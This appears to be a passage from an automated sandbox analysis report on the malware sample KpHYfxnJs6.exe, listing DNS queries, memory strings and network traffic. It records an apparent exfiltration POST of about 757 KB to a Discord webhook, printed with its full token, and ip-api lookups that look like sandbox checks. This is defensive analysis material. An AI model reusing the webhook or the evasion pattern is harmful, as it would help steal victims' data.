              Source: KpHYfxnJs6.exe, 00000004.00000002.2894662678.00000000080D0000.00000004.00001000.00020000.00000000.sdmp, String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
              Source: global traffic, DNS traffic detected: DNS query: blank-whj1o.in
              Source: global traffic, DNS traffic detected: DNS query: ip-api.com
              Source: global traffic, DNS traffic detected: DNS query: discord.com
              Source: unknown, HTTP traffic detected: POST /api/webhooks/1325289657537396889/J06FnIZUAv7ve4gZB3OnZqf37kI5zFxJAxHAJD7bveXtJPDaio_xou6MvVt3E_xErz6c HTTP/1.1, Host: discord.com, Accept-Encoding: identity, Content-Length: 757556, User-Agent: python-urllib3/2.3.0, Content-Type: multipart/form-data; boundary=be021ac6dd6a6f9463cea33afec2e4d4
              Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found, Date: Sun, 05 Jan 2025 06:20:00 GMT, Content-Type: application/json, Content-Length: 45, Connection: close, Cache-Control: public, max-age=3600, s-maxage=3600, strict-transport-security: max-age=31536000; includeSubDomains; preload, x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f, x-ratelimit-limit: 5, x-ratelimit-remaining: 4, x-ratelimit-reset: 1736058001, x-ratelimit-reset-after: 1, via: 1.1 google, alt-svc: h3=":443"; ma=86400, CF-Cache-Status: DYNAMIC, Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zw5vSBldi9iOW%2B9eohdvopcKIAWFYHRKodKbFFkuEUzy6NjtAeQYt%2BV0q9gfoFdO%2F3nGXOF%2BcBDredMg2V2D2z5kQySEIm6wi2C5gtsOEXVdIv4eJe8aFfj1Uo95"}],"group":"cf-nel","max_age":604800}, NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}, X-Content-Type-Options: nosniff, Set-Cookie: __cfruid=5cbfc4dd6375ebbad0e3f09fa787817f5ba62106-1736058000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None, Content-Security-Policy: frame-ancestors 'none'; default-src 'none', Set-Cookie: _cfuvid=bS8fx30a016BJMMg6M7LZNH.avt_AGjRctIj0yxJamY-1736058000314-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None, Server: cloudflare, CF-RAY: 8fd15c226cc4429d-EWR
              Source: KpHYfxnJs6.exe, 00000000.00000003.2050279339.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050279339.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
              Source: KpHYfxnJs6.exe, 00000000.00000003.2051232458.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048894241.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048545047.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051539715.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049199984.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051232458.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049126922.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050014254.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048677870.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048894241.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048387403.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048263051.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049009582.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051327825.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050368927.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048772662.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000002.2912329036.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050553883.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: KpHYfxnJs6.exe, 00000000.00000003.2050279339.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
              Source: KpHYfxnJs6.exe, 00000000.00000003.2050279339.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050279339.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
              Source: KpHYfxnJs6.exe, 00000000.00000003.2048545047.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051539715.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049199984.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051232458.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049126922.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050014254.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048677870.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048894241.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048387403.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048263051.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049009582.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051327825.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050368927.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048772662.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050553883.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
              Source: KpHYfxnJs6.exe, 00000000.00000003.2048545047.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051539715.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049199984.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051232458.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049126922.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050014254.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048677870.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048894241.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048387403.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048263051.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049009582.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051327825.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050368927.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048772662.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050553883.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: KpHYfxnJs6.exe, 00000000.00000003.2051232458.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048894241.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048545047.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051539715.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049199984.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051232458.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049126922.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050014254.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048677870.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048894241.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048387403.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048263051.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049009582.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051327825.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050368927.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048772662.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000002.2912329036.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050553883.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: KpHYfxnJs6.exe, KpHYfxnJs6.exe, 00000004.00000002.2886740253.000000000762F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2621613704.000000000762E000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2602474054.0000000007605000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2880087065.000000000762D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2629341619.000000000762F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2674550956.000000000762D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2598446377.00000000075A4000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2485343382.0000000007616000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2743962657.0000000007628000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2677988442.000000000762E000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2743181116.00000000075A7000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2652879260.000000000762F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484992924.0000000007616000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2684053799.0000000007628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
              Source: KpHYfxnJs6.exe, 00000000.00000003.2050969892.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: powershell.exe, 0000000E.00000002.2554661675.0000000007ACC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mi
              Source: KpHYfxnJs6.exe, 00000000.00000003.2050969892.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
              Source: KpHYfxnJs6.exe, 00000000.00000003.2050969892.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
              Source: KpHYfxnJs6.exe, 00000000.00000003.2051232458.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048894241.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048545047.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051539715.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049199984.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051232458.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049126922.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050014254.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048677870.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048894241.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048387403.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048263051.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049009582.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051327825.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050368927.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048772662.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000002.2912329036.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050553883.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: KpHYfxnJs6.exe, 00000000.00000003.2050279339.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
              Source: KpHYfxnJs6.exe, 00000000.00000003.2050279339.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050279339.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
              Source: KpHYfxnJs6.exe, 00000000.00000003.2048545047.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051539715.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049199984.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051232458.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049126922.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050014254.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048677870.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048894241.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048387403.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048263051.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049009582.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051327825.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050368927.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048772662.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050553883.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
              Source: KpHYfxnJs6.exe, 00000000.00000003.2048545047.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051539715.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049199984.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051232458.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049126922.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050014254.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048677870.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048894241.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048387403.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048263051.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049009582.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051327825.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050368927.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048772662.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050553883.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: KpHYfxnJs6.exe, 00000000.00000003.2050553883.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: KpHYfxnJs6.exe, 00000000.00000003.2050279339.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
              Source: KpHYfxnJs6.exe, 00000000.00000003.2050279339.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050279339.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
              Source: KpHYfxnJs6.exe, 00000000.00000003.2050279339.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050279339.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
              Source: KpHYfxnJs6.exe, 00000000.00000003.2048263051.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049009582.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051327825.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050368927.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048772662.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050553883.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
              Source: KpHYfxnJs6.exe, 00000000.00000003.2050279339.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
              Source: KpHYfxnJs6.exe, 00000000.00000003.2050279339.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050279339.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
              Source: KpHYfxnJs6.exe, 00000000.00000003.2050969892.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
              Source: KpHYfxnJs6.exe, 00000004.00000003.2744996096.0000000004E44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
              Source: KpHYfxnJs6.exe, KpHYfxnJs6.exe, 00000004.00000003.2484058044.00000000075F6000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2621699329.0000000007607000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2629341619.0000000007607000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2602474054.0000000007605000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2674876245.0000000007606000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2745181563.000000000760B000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2880829085.000000000760D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2598446377.00000000075A4000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2485343382.0000000007616000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2880603625.00000000075B1000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2886692444.0000000007611000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2743181116.00000000075A7000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484414365.00000000075F6000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2744799637.0000000007604000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484992924.0000000007616000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2678320239.0000000007606000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
              Source: KpHYfxnJs6.exe, KpHYfxnJs6.exe, 00000004.00000003.2646596317.000000000759F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2881487113.00000000075B1000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2616436229.000000000759F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2623954278.000000000759F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2604998063.000000000759F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2674876245.000000000759F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2485485628.000000000759F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484622291.000000000759F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2598446377.00000000075A4000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2880603625.00000000075B1000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2886303879.00000000075B1000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2636804800.000000000759F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2743181116.00000000075A7000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484992924.000000000759F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
              Source: KpHYfxnJs6.exe, KpHYfxnJs6.exe, 00000004.00000003.2485485628.000000000754D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2886303879.000000000754E000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2880603625.0000000007531000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2621699329.000000000754E000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2881124605.0000000007538000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2604998063.000000000753A000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2744888765.0000000007538000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484992924.000000000753D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484622291.000000000759F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2674876245.000000000754F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2744505869.0000000007534000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2646596317.000000000754F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2617001102.000000000754D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2598446377.000000000753D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2880323805.000000000752A000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484622291.000000000753D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2885316620.0000000007280000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2636804800.000000000754F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2616436229.000000000753A000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2881487113.000000000754D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
              Source: KpHYfxnJs6.exe, 00000004.00000002.2887094971.0000000007680000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545
              Source: KpHYfxnJs6.exe, 00000004.00000003.2478525304.0000000007540000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2478427258.00000000074FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545r
              Source: KpHYfxnJs6.exe, 00000004.00000002.2886022937.0000000007440000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
              Source: KpHYfxnJs6.exe, 00000004.00000003.2478427258.00000000074FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hostingr
              Source: KpHYfxnJs6.exe, 00000004.00000002.2885316620.0000000007280000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://json.org
              Source: powershell.exe, 0000000E.00000002.2545646683.0000000006036000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.2729350973.000000000575C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: KpHYfxnJs6.exe, 00000000.00000003.2050969892.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
